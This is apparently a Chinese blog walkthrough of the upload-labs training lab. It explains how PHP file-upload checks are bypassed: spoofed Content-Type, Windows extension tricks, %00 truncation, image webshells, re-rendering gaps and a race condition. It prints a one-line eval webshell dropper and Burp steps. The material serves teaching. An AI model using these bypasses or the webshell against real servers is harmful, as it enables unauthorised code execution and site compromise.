当前位置：首页 > news >正文

webshell一些上传心得

news 来源：原创 2025/8/22 12:52:09

我们以upload-labs为基础

一、前端拦截：

如第一关

工作方式：

直接在前端拦截

绕过方式：

因为没有限制后端，所有可以用bs 绕过前端修改格式即可

将需要上传的php文件改成jpg格式
使用burp suite 拦截上传后，使用repeater模块将jpg改回php发送即可
可以看到成功上传

二、只判断文件类型：

如第二关

工作方式：

只判断了文件的类型，而没有进行其他的检查方式

绕过方式：

使用bs将返回的数据包中文件格式直接改成允许的文件格式即可绕过

将php文件上传的同时使用bs抓包
使用repeater模块，将content-type中数据改为image/png即可
可以看到已成功上传

三、黑名单限制

如第5、6、7、8、9关（因为是windows的特性，所以只能在windows中使用）

工作方式：

匹配到代码带有的黑名单后会直接拦截

绕过方式：

将后缀改为一些没有被拦截到的方式进行绕过

绕过方式	示例	绕过原因
修改大小写绕过	`1.Php`	windows不区分大小写
添加末尾空格绕过	`1.php`	Windows会自动删除首尾空格
在末尾添加 . 绕过	1.php.	windows会删除末尾的点
在末尾添加 `::$DATA`绕过	`1.php:$DATA`	Windows会将以`::$DATA`结尾的文件以数据流的方式处理

四、删除黑名单内容

如第十关

工作方式：

将匹配到的黑名单的信息删掉

绕过方式：

双写代码实现绕过如1.pphphp

五、修改文件上传位置：

如第十一、十二关

工作方式：

用户在上传文件后，程序将在temp目录下生成一个临时文件，再将该文件转到程序指定的目录下

绕过方式：

在第十一关：文件保存路径是由第9行代码决定

# 第十一关的部分代码如下
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);if(in_array($file_ext,$ext_arr)){$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;  # 看这行代码if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = '上传出错！';}} else{$msg = "只允许上传.jpg|.png|.gif类型文件！";}
}

我们随意上传一个文件：可以看出用户可以修改save_path函数的内容，那我们将内容改为../uploads/1.php%00 然后上传文件后缀为.jpg的php文件，代码处得到的后缀为jpg，能够通过对文件后缀的检测，但在$img_path变量处就会出现其值为../uploads/1.php%00+随机日期.jpg，当执行move_uploaded_file函数时，服务器会对路径中%00后的内容不做解析，默认迁移文件为../uploads/1.php。

%00截断原理：

这是字符串的结束标识符（不再对后文的信息进行处理），攻击者可以利用手动添加字符串标识符的方式将后面的内容忽略，而后面的内容又可以帮助我们绕过检测。

在这里插入图片描述

将jpg格式的php文件上传的同时使用bs抓包
将抓到的数据包转到repeater模块同时修改save_path 并发送
可以看出php文件以及上传为1.php。同时，因为1.php后面的\0将后面的jpg忽略了

注意在第十二关中使用的是post方法，需要对%00解码：在这里插入图片描述

六、文件头检查（文件包含）：

如第14、15、16关

工作方式：

function getReailFileType($filename){$file = fopen($filename, "rb");$bin = fread($file, 2); //只读2字节fclose($file);$strInfo = @unpack("C2chars", $bin);    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    $fileType = '';    switch($typeCode){      case 255216:            $fileType = 'jpg';break;case 13780:            $fileType = 'png';break;        case 7173:            $fileType = 'gif';break;default:            $fileType = 'unknown';}    return $fileType;
}

如这个函数片段，该检查方式是查看文件头部的两个字节的信息（前几个字节是格式信息）。如图：

在这里插入图片描述

绕过方式：

前提：需要有文件包含漏洞才可实现，因为使用图片马会导致拼接的php代码无法解析

因为检查的文件头部信息，上述的如改文件格式等方式肯定是不行了，就需要使用图片马了

图片马：

在图片信息的后面拼接木马信息，使得在检查时，前几个字节仍然是正常的图片信息，但后面的php不会被检查，从而绕过检测上传

制作图片马：

打开cmd窗口（注意工作目录）、copy 1.png/b + 1.php /a 1.png 在这里插入图片描述
拼接之后的数据：

将制作好的图片马直接上传
再利用文件包含漏洞即可成功

七、二次渲染：

第16关

工作方式：

用户上传图片后，程序并没有直接将该图片使用，而是用该图片生成一个新的图片，将新的图片用于内部使用

     $im = imagecreatefromjpeg($target_path);
# 用$target_path的图片生成一个新的图片赋值给$im

绕过方式：

图片会进行二次渲染从而使图片马不能正常使用，需要寻找没有被修改且不会影响图片格式的部分插入一句话木马

格式	webshell插入位置
GIF：	可以直接在渲染前后没变化的数据块插入木马即可
PNG：	需要将数据写入PLTE或IDAT模块
JPG：	需要插入到指定的数据块，而且可能不成功，所以需要多次尝试

GIF绕过：

上传一个普通的GIF图片；将渲染后的图片下载后进行比较
使用010editer等工具进行比较
最好选择相同且为全0的填充字段，如果没有，在偏后的部分找相同字段修改也可以的

在这里插入图片描述

利用文件包含漏洞访问

八、条件竞争

第十七关

工作方式

$is_upload = false;
$msg = null;if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_name = $_FILES['upload_file']['name'];$temp_file = $_FILES['upload_file']['tmp_name'];$file_ext = substr($file_name,strrpos($file_name,".")+1);$upload_file = UPLOAD_PATH . '/' . $file_name;if(move_uploaded_file($temp_file, $upload_file)){  				 #移动文件if(in_array($file_ext,$ext_arr)){ 							# 判断文件后缀$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;rename($upload_file, $img_path);$is_upload = true;}else{$msg = "只允许上传.jpg|.png|.gif类型文件！";unlink($upload_file);           						 # 删除文件}}else{$msg = '上传出错！';}
}

代码的处理流程

移动文件到指定路径
判断文件后缀是否符合
符合则重命名；不符合则删除文件

绕过方式

像这种存在代码逻辑问题（先移动再删除），服务器处理过程中，总是有时间差，而我们上传图片后在文件还没被删除时就快速访问目标文件（上传的文件是在上级目录再创建一个木马文件），就能够在删除前就创建新的木马文件，源文件删除后，新木马文件并不会删除

创建木马文件q.php：在执行时会在上级目录生成一个1.php的木马文件

<?php fputs(fopen('../1.php','w'),'<?php @eval($_POST["111"])?>');?>

将q.php上传并用bs抓包

转入intruder模块，随便设置一下
再抓一个访问q.php的数据包
也转入intruder模块
准备工作做好后，开始攻击

可以看到有一个成功，再打开vscode
1.php已经生成

一、前端拦截：

工作方式：

绕过方式：

二、只判断文件类型：

工作方式：

绕过方式：

三、黑名单限制

工作方式：

绕过方式：

四、删除黑名单内容

工作方式：

绕过方式：

五、修改文件上传位置：

工作方式：

绕过方式：

%00截断原理：

六、文件头检查（文件包含）：

工作方式：

绕过方式：

图片马：

七、二次渲染：

工作方式：

绕过方式：

八、条件竞争

工作方式

绕过方式

相关文章：